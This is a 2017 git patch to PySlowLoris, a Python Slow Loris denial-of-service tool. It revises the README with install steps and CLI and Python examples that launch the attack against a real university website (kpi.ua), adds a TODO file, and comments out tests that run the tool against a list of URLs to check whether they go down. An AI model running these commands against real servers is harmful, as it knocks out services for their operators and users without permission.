From c9483bf3404247971ff73dd6e60e66a81471594d Mon Sep 17 00:00:00 2001 From: Max Krivich Date: Wed, 30 Aug 2017 11:33:59 +0300 Subject: [PATCH] move todo list readme.md --> todo.md --- README.md | 80 +++++++++++++----- TODO.md | 20 +++++ tests/test_sl.py | 210 +++++++++++++++++++++++------------------------ 3 files changed, 185 insertions(+), 125 deletions(-) create mode 100644 TODO.md diff --git a/README.md b/README.md index d059066..f3dda08 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,7 @@ [![Build Status](https://travis-ci.org/maxkrivich/SlowLoris.svg?branch=master)](https://travis-ci.org/maxkrivich/SlowLoris) [![Coverage Status](https://coveralls.io/repos/github/maxkrivich/SlowLoris/badge.svg?branch=master)](https://coveralls.io/github/maxkrivich/SlowLoris?branch=master) [![Requirements Status](https://requires.io/github/maxkrivich/SlowLoris/requirements.svg?branch=master)](https://requires.io/github/maxkrivich/SlowLoris/requirements/?branch=master) - +[![Code Health](https://landscape.io/github/maxkrivich/SlowLoris/master/landscape.svg?style=flat)](https://landscape.io/github/maxkrivich/SlowLoris/master) This repository was created for testing Slow Loris vulnerability on different web servers. SL based on keeping alive open connection as long as possible and sending some trash headers to the server. If you are interested what I'm trying doing here, please join my team and let's do fun together. Please DO NOT use this in the real attacks on the servers. @@ -13,40 +13,80 @@ The main reason why I'm writing this module it is to create the easy tool for th More information you can find [here]. -### Usage +### Install module -Options | Description -------------------------------------------------|-------------- --h, --help | Show help message --u URL, --url | Link to the web server (http://google.com) - str --p PORT, --port | Port what will be used - int --s SOCKET_COUNT, --socket-count | Maximum count of created connection (default value 300) - int +##### PyPi +Installing module form PyPi: +```sh +$ pip install pyslowloris +``` +##### Docker +Pulling from Docker hub: +```sh +$ docker pull maxkivich/pyslowloris +$ docker run --rm -it maxkivich/pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT] +``` +Build from Dockerfile: ```sh -$ slowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT] +$ docker build -t pyslowloris . +$ docker run --rm -it pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT] ``` -###### stop execution: Ctrl + C +##### For contributors +```sh +$ git clone https://github.com/maxkrivich/SlowLoris.git +$ cd SlowLoris +$ vitualenv --python=[python version] venv +$ source venv/bin/active +$ pip install --editable . +``` -### Install module +### Usage +```sh +usage: slowloris [-h] [-u URL] [-s SOCKET_COUNT] [-p PORT] +Small and simple tool for testing Slow Loris vulnerability @maxkrivich + +optional arguments: + -h, --help Show this help message and exit + -u URL, --url URL Link to the web server (http://google.com) - str + -s SOCKET_COUNT, --socket-count SOCKET_COUNT Maximum count of created connection (default value + 300) - int + -p PORT, --port PORT Port what will be used - int + +``` + +#### Code example +Here are some example to start attack via Python +```py +import time +from PySlowLoris import TargetInfo, SlowLorisAttack + +target = TargetInfo(url="http://kpi.ua/", port=80) +target.get_info() +slowloris = SlowLorisAttack(target) +slowloris.start_attack() # stop_attack() + +while True: + time.sleep(1) + +``` + +#### Using module via CLI +The following command helps to use module via command line ```sh -$ pip install pyslowloris +$ slowloris -u http://kpi.ua/ -s 300 ``` -### TODO list -- [ ] add proxy, multiple headers(useragent and other). -- [x] add logging -- [ ] add ssl support -- [ ] add file list attack -- [ ] add docker image to docker hub -If you find [bugs] or have [suggestions] about improving the module, don't hesitate to contact [me]. +###### stop execution: Ctrl + C +If you find [bugs] or have [suggestions] about improving the module, don't hesitate to contact [me]. ### License -Copyright (c) 2017 Maxim Krivich, https://maxkrivich.github.io/ +Copyright (c) 2017 Maxim Krivich, [maxkrivich.github.io](https://maxkrivich.github.io/) Licensed under the MIT License diff --git a/TODO.md b/TODO.md new file mode 100644 index 0000000..6a45abc --- /dev/null +++ b/TODO.md @@ -0,0 +1,20 @@ +# TODO list + +### New features +- [ ] add proxy, multiple headers(useragent and other); +- [x] add logging; +- [ ] add ssl support; +- [ ] add file list attack; +- [x] add docker image to docker hub; + +### Bugs +- [ ] crash app when url not exist; +- [ ] bug with timeouts; +- [ ] logging errors; +--- +If you find [bugs] or have [suggestions] about improving the module, don't hesitate to contact [me]. + +[here]: +[bugs]: +[suggestions]: +[me]: diff --git a/tests/test_sl.py b/tests/test_sl.py index 7e4a2df..cb2e4ba 100755 --- a/tests/test_sl.py +++ b/tests/test_sl.py @@ -25,108 +25,108 @@ SOFTWARE. """ -import sys -import time -import random -import unittest -import urllib2 -import subprocess as sub - -from Queue import Queue -from threading import Thread - -from PySlowLoris import TargetInfo - -__all__ = ['test_sl', 'test_sl_multi'] - - -class TestTargetInfo(unittest.TestCase): - def test_target_ok(self): - t = TargetInfo(url="https://google.com", port=80) - t.get_info() - self.assertNotEquals(t['Server'], '') - - -class RunCmd(Thread): - def __init__(self, cmd, timeout): - Thread.__init__(self) - print cmd - self.cmd = cmd - self.timeout = timeout - - def run(self): - self.p = sub.Popen(self.cmd) - self.p.wait() - - def Run(self): - self.start() - self.join(self.timeout) - - if self.is_alive(): - self.p.terminate() # use self.p.kill() if process needs a kill -9 - self.join() - - -def read_file(*args): - res = [] - for file in args: - with open(file, 'r') as f: - res += [s.rstrip() for s in f.readlines()] - return res - - -def test_sl(): - s = SlowLoris(url="kpi.ua") - s.start() - while True: - try: - sys.stdout.write("\r{}".format(s.get_counters())) - sys.stdout.flush() - time.sleep(1) - except: - s.kill() - sys.exit(-1) - - -def do_work(url): - RunCmd(["./slow_loris.py", "-u {}".format(url)], 60 * random.randint(2, 6)) - time.sleep(60 * random.randint(1, 3)) - n, m = 0, 0 - total = 10 - for _ in xrange(total): - try: - response = urllib2.urlopen(url, timeout=1) - if response.getcode() == 200: - n += 1 - else: - m += 1 - except: - m += 1 - time.sleep(0.043 * random.random()) - return m >= total // 2 # TRUE-success - - -def worker(queue): - while True: - url = queue.get() - f = do_work(url) - if f: - sys.stdout.write('{}\n'.format(url)) - sys.stdout.flush() - queue.task_done() - - -def test_sl_multi(): - urls = read_file('test_urls.txt') - - q = Queue() - - for _ in xrange(3): - t = Thread(target=worker, args=(q,)) - t.setDaemon(True) - t.start() - - for url in urls: - q.put(url) - - q.join() +# import sys +# import time +# import random +# import unittest +# import urllib2 +# import subprocess as sub +# +# from Queue import Queue +# from threading import Thread +# +# from PySlowLoris import TargetInfo +# +# __all__ = ['test_sl', 'test_sl_multi'] +# +# +# class TestTargetInfo(unittest.TestCase): +# def test_target_ok(self): +# t = TargetInfo(url="https://google.com", port=80) +# t.get_info() +# self.assertNotEquals(t['Server'], '') +# +# +# class RunCmd(Thread): +# def __init__(self, cmd, timeout): +# Thread.__init__(self) +# print cmd +# self.cmd = cmd +# self.timeout = timeout +# +# def run(self): +# self.p = sub.Popen(self.cmd) +# self.p.wait() +# +# def Run(self): +# self.start() +# self.join(self.timeout) +# +# if self.is_alive(): +# self.p.terminate() # use self.p.kill() if process needs a kill -9 +# self.join() +# +# +# def read_file(*args): +# res = [] +# for file in args: +# with open(file, 'r') as f: +# res += [s.rstrip() for s in f.readlines()] +# return res +# +# +# def test_sl(): +# s = SlowLoris(url="kpi.ua") +# s.start() +# while True: +# try: +# sys.stdout.write("\r{}".format(s.get_counters())) +# sys.stdout.flush() +# time.sleep(1) +# except: +# s.kill() +# sys.exit(-1) +# +# +# def do_work(url): +# RunCmd(["./slow_loris.py", "-u {}".format(url)], 60 * random.randint(2, 6)) +# time.sleep(60 * random.randint(1, 3)) +# n, m = 0, 0 +# total = 10 +# for _ in xrange(total): +# try: +# response = urllib2.urlopen(url, timeout=1) +# if response.getcode() == 200: +# n += 1 +# else: +# m += 1 +# except: +# m += 1 +# time.sleep(0.043 * random.random()) +# return m >= total // 2 # TRUE-success +# +# +# def worker(queue): +# while True: +# url = queue.get() +# f = do_work(url) +# if f: +# sys.stdout.write('{}\n'.format(url)) +# sys.stdout.flush() +# queue.task_done() +# +# +# def test_sl_multi(): +# urls = read_file('test_urls.txt') +# +# q = Queue() +# +# for _ in xrange(3): +# t = Thread(target=worker, args=(q,)) +# t.setDaemon(True) +# t.start() +# +# for url in urls: +# q.put(url) +# +# q.join()